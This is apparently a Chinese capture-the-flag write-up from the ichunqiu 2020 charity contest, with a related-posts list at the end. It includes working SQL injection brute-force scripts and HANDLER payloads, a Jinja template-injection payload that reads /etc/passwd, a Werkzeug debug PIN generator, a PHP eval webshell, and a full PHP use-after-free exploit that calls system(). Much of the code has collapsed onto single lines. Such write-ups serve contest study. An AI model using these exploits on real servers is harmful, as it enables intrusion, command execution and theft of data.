公益赛

day1

签到

观看视频，最后得到flag

code_in_morse

先用 CyberChef得到一张图片
得到的图片扫描后得到一个图片
f5隐写得到flag

web

弱口令admin admin888 登陆
在search界面发现注入点，用sqlmap配置cookie直接爆破

ezupload

上传一句话木马
执行 bash -c /readflag > tmp
执行 cat tmp

day2

easysqli_copy

审计代码。发现可以利用宽字节注入使用’，再使用时间盲注获取数据，构造paylaod闭合语句
过滤了select，但是可以用concat+char构造select
用set+prepare+execute 来读取数据
先读表名table1再读列名fllllll4g，最后爆破flag


import requests
url = ''
res = ''
for i in range(1,43):for s  in range(45,126):t1 = 'select if(ascii(substr((select fllllll4g from table1),{},1))={},sleep(10),1)'.format(i,s)t2 = ''for k in t1:t2 += 'char({}),'.format(ord(k))t3 = "set @t1=concat({});PREPARE t2 FROM @t1;EXECUTE t2;||{}%271{}%27={}%271".format(t2[:-1],"%df","%df","%df")payload = '?id=1{}%27;{}'.format('%df',t3)try:re1 = requests.get(url+payload,timeout=5)except Exception as e:res += chr(s)print(res)break
print('res:'+res)

Ezsqli

通过测试发现 8 || 1=1 回显Nu1L，8 || 1=0 不回显，所以可以实现盲注
测试得过滤了 in 和 union select
首先爆表，但是过滤了in 所以用select group_concat(table_name) from sys.schema_table_statistics_with_buffer where table_schema=database()),{},1)
得到表名f1ag_1s_h3r3_hhhhh
获取数据采用无列名注入，参考的paylaod是(select 'admin','admin')>(select * from users limit 1)
构造最终payload


import requests
from lxml import etree
def get_data(payload):url = ''data = {'id':payload}req = requests.post(url,data=data) data = req.textreturn data
res = ''
for i in range(1,100):flag = 0for j in range(45,126):a1 = str(hex(j)).replace('0x','')a2 = ''for k in res:a2 += str(hex(ord(k))).replace('0x','')# f1ag_1s_h3r3_hhhhhpayload = "id=9|| (( select 1,0x{} )> (select * from (f1ag_1s_h3r3_hhhhh)))".format(a2+a1)# print(payload)data = get_data(payload)if 'hacker' in  data:exit(-1)if 'Nu1L' in data:print(chr(j-1))res += chr(j-1)flag = 1print(res)breakif flag:passelse:breakprint(res)

blacklist

类似强网杯的随便注
但是用随便注的方法只能获取到表名和列名
于是尝试用handler
构造paylaod inject=1';handler FlagHere open;handler FlagHere read first;handler FlagHere close;
获得flag

day3

Flaskapp

利用base64decode进行ssti模板注入读取文件


config e3tjb25maWd9fQ== 'SECRET_KEY': 's_e_c_r_e_t_k_e_y',
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('/etc/passwd', 'r').read() }}{% endif %}{% endfor %}
eyUgZm9yIGMgaW4gW10uX19jbGFzc19fLl9fYmFzZV9fLl9fc3ViY2xhc3Nlc19fKCkgJX17JSBpZiBjLl9fbmFtZV9fPT0nY2F0Y2hfd2FybmluZ3MnICV9e3sgYy5fX2luaXRfXy5fX2dsb2JhbHNfX1snX19idWlsdGluc19fJ10ub3BlbignL2V0Yy9wYXNzd2QnLCAncicpLnJlYWQoKSB9fXslIGVuZGlmICV9eyUgZW5kZm9yICV9/sys/class/net/eth0/address
eyUgZm9yIGMgaW4gW10uX19jbGFzc19fLl9fYmFzZV9fLl9fc3ViY2xhc3Nlc19fKCkgJX17JSBpZiBjLl9fbmFtZV9fPT0nY2F0Y2hfd2FybmluZ3MnICV9e3sgYy5fX2luaXRfXy5fX2dsb2JhbHNfX1snX19idWlsdGluc19fJ10ub3BlbignL3N5cy9jbGFzcy9uZXQvZXRoMC9hZGRyZXNzJywgJ3InKS5yZWFkKCkgfX17JSBlbmRpZiAlfXslIGVuZGZvciAlfQ==
02:42:ac:12:00:06
2485377957894
/proc/self/cgroup
eyUgZm9yIGMgaW4gW10uX19jbGFzc19fLl9fYmFzZV9fLl9fc3ViY2xhc3Nlc19fKCkgJX17JSBpZiBjLl9fbmFtZV9fPT0nY2F0Y2hfd2FybmluZ3MnICV9e3sgYy5fX2luaXRfXy5fX2dsb2JhbHNfX1snX19idWlsdGluc19fJ10ub3BlbignL3Byb2Mvc2VsZi9jZ3JvdXAnLCAncicpLnJlYWQoKSB9fXslIGVuZGlmICV9eyUgZW5kZm9yICV912:perf_event:/docker/97e3793194a6e8c1ea3c5081158f336f3f46797be8f44207ee5ed3b49f85ea1f

利用读取的信息构造pin码

import hashlib
from itertools import chain
probably_public_bits = ['flaskweb',#     'flask.app',# modname'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__'))'/usr/local/lib/python3.7/site-packages/flask/app.py' # getattr(mod, '__file__', None),
]private_bits = [# str(uuid.getnode()),  /sys/class/net/ens33/address  /sys/class/net/eth0/address#02:42:ac:16:00:06'2485377957894',# get_machine_id(), /etc/machin-id /proc/self/cgroup 6afeacdf-afcf-4552-8502-719172374dda'97e3793194a6e8c1ea3c5081158f336f3f46797be8f44207ee5ed3b49f85ea1f'
]h = hashlib.md5()
for bit in chain(probably_public_bits, private_bits):if not bit:continueif isinstance(bit, str):bit = bit.encode('utf-8')h.update(bit)
h.update(b'cookiesalt')cookie_name = '__wzd' + h.hexdigest()[:20]num = None
if num is None:h.update(b'pinsalt')num = ('%09d' % int(h.hexdigest(), 16))[:9]rv =None
if rv is None:for group_size in 5, 4, 3:if len(num) % group_size == 0:rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')for x in range(0, len(num), group_size))breakelse:rv = numprint(rv)

利用pin码进入debug界面
读取flag


import osos.listdir('/')open('jibuqingle.txt','r').read()

easy_thinking

通过测试发现是tp6框架
搜索到tp6有任意文件操作漏洞
测试得/runtime/session/文件夹存在
于是修改session为.php结尾
查看session文件，可以发现储存的是搜索历史
在搜索框搜索<?php @eval($_GET['rdd']);?>
然后连接shell
执行phpinfo(),发现禁用了好多函数
没法直接命令执行
考虑bypass，使用师傅的bypass脚本
最后用copy函数远程复制脚本
运行脚本得flag


<?php
//pwn("/readflag");
@pwn($_GET['rdd']);
function pwn($cmd) {global $abc, $helper;function str2ptr(&$str, $p = 0, $s = 8) {$address = 0;for($j = $s-1; $j >= 0; $j--) {$address <<= 8;$address |= ord($str[$p+$j]);}return $address;}function ptr2str($ptr, $m = 8) {$out = "";for ($i=0; $i < $m; $i++) {$out .= chr($ptr & 0xff);$ptr >>= 8;}return $out;}function write(&$str, $p, $v, $n = 8) {$i = 0;for($i = 0; $i < $n; $i++) {$str[$p + $i] = chr($v & 0xff);$v >>= 8;}}function leak($addr, $p = 0, $s = 8) {global $abc, $helper;write($abc, 0x68, $addr + $p - 0x10);$leak = strlen($helper->a);if($s != 8) { $leak %= 2 << ($s * 8) - 1; }return $leak;}function parse_elf($base) {$e_type = leak($base, 0x10, 2);$e_phoff = leak($base, 0x20);$e_phentsize = leak($base, 0x36, 2);$e_phnum = leak($base, 0x38, 2);for($i = 0; $i < $e_phnum; $i++) {$header = $base + $e_phoff + $i * $e_phentsize;$p_type = leak($header, 0, 4);$p_flags = leak($header, 4, 4);$p_vaddr = leak($header, 0x10);$p_memsz = leak($header, 0x28);if($p_type == 1 && $p_flags == 6) { # PT_LOAD, PF_Read_Write# handle pie$data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr;$data_size = $p_memsz;} else if($p_type == 1 && $p_flags == 5) { # PT_LOAD, PF_Read_exec$text_size = $p_memsz;}}if(!$data_addr || !$text_size || !$data_size)return false;return [$data_addr, $text_size, $data_size];}function get_basic_funcs($base, $elf) {list($data_addr, $text_size, $data_size) = $elf;for($i = 0; $i < $data_size / 8; $i++) {$leak = leak($data_addr, $i * 8);if($leak - $base > 0 && $leak - $base < $text_size) {$deref = leak($leak);# 'constant' constant checkif($deref != 0x746e6174736e6f63)continue;} else continue;$leak = leak($data_addr, ($i + 4) * 8);if($leak - $base > 0 && $leak - $base < $text_size) {$deref = leak($leak);# 'bin2hex' constant checkif($deref != 0x786568326e6962)continue;} else continue;return $data_addr + $i * 8;}}function get_binary_base($binary_leak) {$base = 0;$start = $binary_leak & 0xfffffffffffff000;for($i = 0; $i < 0x1000; $i++) {$addr = $start - 0x1000 * $i;$leak = leak($addr, 0, 7);if($leak == 0x10102464c457f) { # ELF headerreturn $addr;}}}function get_system($basic_funcs) {$addr = $basic_funcs;do {$f_entry = leak($addr);$f_name = leak($f_entry, 0, 6);if($f_name == 0x6d6574737973) { # systemreturn leak($addr + 8);}$addr += 0x20;} while($f_entry != 0);return false;}class ryat {var $ryat;var $chtg;function __destruct(){$this->chtg = $this->ryat;$this->ryat = 1;}}class Helper {public $a, $b, $c, $d;}if(stristr(PHP_OS, 'WIN')) {die('This PoC is for *nix systems only.');}$n_alloc = 10; # increase this value if you get segfaults$contiguous = [];for($i = 0; $i < $n_alloc; $i++)$contiguous[] = str_repeat('A', 79);$poc = 'a:4:{i:0;i:1;i:1;a:1:{i:0;O:4:"ryat":2:{s:4:"ryat";R:3;s:4:"chtg";i:2;}}i:1;i:3;i:2;R:5;}';$out = unserialize($poc);gc_collect_cycles();$v = [];$v[0] = ptr2str(0, 79);unset($v);$abc = $out[2][0];$helper = new Helper;$helper->b = function ($x) { };if(strlen($abc) == 79 || strlen($abc) == 0) {die("UAF failed");}# leaks$closure_handlers = str2ptr($abc, 0);$php_heap = str2ptr($abc, 0x58);$abc_addr = $php_heap - 0xc8;# fake valuewrite($abc, 0x60, 2);write($abc, 0x70, 6);# fake referencewrite($abc, 0x10, $abc_addr + 0x60);write($abc, 0x18, 0xa);$closure_obj = str2ptr($abc, 0x20);$binary_leak = leak($closure_handlers, 8);if(!($base = get_binary_base($binary_leak))) {die("Couldn't determine binary base address");}if(!($elf = parse_elf($base))) {die("Couldn't parse ELF header");}if(!($basic_funcs = get_basic_funcs($base, $elf))) {die("Couldn't get basic_functions address");}if(!($zif_system = get_system($basic_funcs))) {die("Couldn't get zif_system address");}# fake closure object$fake_obj_offset = 0xd0;for($i = 0; $i < 0x110; $i += 8) {write($abc, $fake_obj_offset + $i, leak($closure_obj, $i));}# pwnwrite($abc, 0x20, $abc_addr + $fake_obj_offset);write($abc, 0xd0 + 0x38, 1, 4); # internal func typewrite($abc, 0xd0 + 0x68, $zif_system); # internal func handler($helper->b)($cmd);exit();
}

ichunqiu 新春公益赛相关推荐

i春秋2020新春公益赛WEB复现Writeup
i春秋2020新春公益赛WEB复现Writeup 说实话这个比赛打的我是一点毛病都没有,还是觉得自己掌握的东西太少了,,, 尤其是sql注入,都被大佬们玩出花来了,可能自己太菜,,,哭了!!! 关于S ...
i春秋2020新春公益赛 GYCTF有关SQL注入题复现
0x00 前言最近这段时间参加过一些CTF在线竞赛,做过一些Web题,发现SQL注入漏洞出现的频率可真高!不过在做题中也get到了一些Web新知识,现在通过题目复现的方式总结一下. 0x01 bla ...
ctfshow 2022新春迎新赛(详细解说)
ctfshow 新春迎新赛热身 <?php/* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2022-01-16 15:42:02 # @ ...
ctfshow _新春欢乐赛
ctfshow _新春欢乐赛写在前面:这样每天一道题目,深入学习一个知识点,对于语言的理解会更加清晰,也通过这几天的做题学到很多东西,这里总结下做题过程,下次遇到相同问题能够避免热身这个题开始做 ...
ichunqiu圣诞欢乐赛babyre
ichunqiu圣诞欢乐赛babyre 程序关键函数在此此处是一些有关于多线程的函数,正好借此机会学习一下,顺便学习了一下多线程调试文章如下 https://bbs.pediy.com/thread ...
i春秋新春战疫公益赛复现
blaklist 以前做过BUU的强网杯随便注,不过当时的两种解法都不行,做了这道题算是又学会了一种方法,直接记录在BUU的博客里了: https://blog.csdn.net/qq_4465789 ...
2020新春战疫ctf公益赛——Misc套娃
一看套娃就能猜到会是一个繁琐的题目,从压缩包里放着压缩包可以猜测整个题目的过程中寻找压缩包密码是一条主线. 第一层很明显的txt里边Ook的加密,解密便得到压缩包2的密码. brainfuck/Oo ...
2020新春战疫网络安全公益赛——MISC套娃
对于这个题,膜拜出题人的脑洞,废话不多说,上wp MISC套娃第一层打开1.txt 全是Ook 可知是Ook加密,可以得到第二层的密码然后还有张唐僧的图片,用Hex editor分析,发现最后有 ...
[ctfshow]2022 新春欢乐赛 wp
热身开局看到源码,但是却没有显示源码的代码.那么只能是被包含进去了,直接phpinfo搜prepend可以看到包含的文件,查看之得到flag. ?f=system("tac etc/ssh ...

ichunqiu 新春公益赛

文章目录

公益赛

day1

签到

code_in_morse

web

ezupload

day2

easysqli_copy

Ezsqli

blacklist

day3

Flaskapp

easy_thinking

ichunqiu 新春公益赛相关推荐

最新文章

热门文章